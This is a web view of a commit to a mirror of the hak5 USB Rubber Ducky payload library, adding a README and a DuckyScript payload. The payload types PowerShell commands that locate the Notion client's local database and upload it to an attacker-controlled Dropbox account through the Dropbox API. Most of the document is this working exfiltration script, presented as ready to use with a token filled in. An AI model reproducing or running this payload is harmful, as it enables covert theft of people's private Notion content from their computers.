hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #338 from aleff-github/patch-57 

Exfiltrates the entire database of the Notion client
pull/393/merge
Dallas Winger 2024-01-08 02:19:37 -05:00 committed by GitHub
parent 276a5f0cd5 3b115eccbe
commit ef35f52d18
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 98 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md Normal file
View File

@ -0,0 +1,50 @@
# Exfiltrates the entire database of the Notion client
This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
**Category**: Exfiltration
## Description
This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
Open a PowerShell, the get dinamically the Notion full-path and then add the `notion.db` string. Then create all the needed variables for the exfiltration and then send it trough Dropbox. I used Dropbox but you can use whatever you want.
## Dependencies
* Notion must be installed
* Internet Connection
## Settings
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE #DROPBOX_ACCESS_TOKEN "example"`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>

48
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt Normal file
View File

@ -0,0 +1,48 @@
REM #########################################################################
REM # |
REM # Title : Exfiltrates the entire database of the Notion client |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM #########################################################################
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
STRING PowerShell
ENTER
DELAY 2000
REM Settings about Notion DB
STRINGLN
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
END_STRINGLN
REM Setting about exfiltration
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
STRINGLN
$authHeader = @{Authorization = "Bearer $accessToken"}
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/notion.db"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit;
END_STRINGLN